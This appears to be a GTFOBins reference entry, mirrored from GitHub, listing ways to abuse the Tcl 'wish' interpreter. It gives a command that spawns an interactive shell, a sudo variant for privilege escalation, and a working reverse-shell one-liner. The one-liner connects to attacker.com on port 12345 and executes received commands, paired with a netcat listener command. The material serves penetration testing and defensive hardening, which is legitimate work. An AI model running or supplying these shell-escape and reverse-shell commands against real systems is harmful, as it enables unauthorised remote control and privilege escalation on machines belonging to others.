1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/wish.md
2018-05-25 15:30:02 +02:00

18 lines
612 B
Markdown

---
functions:
execute-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
---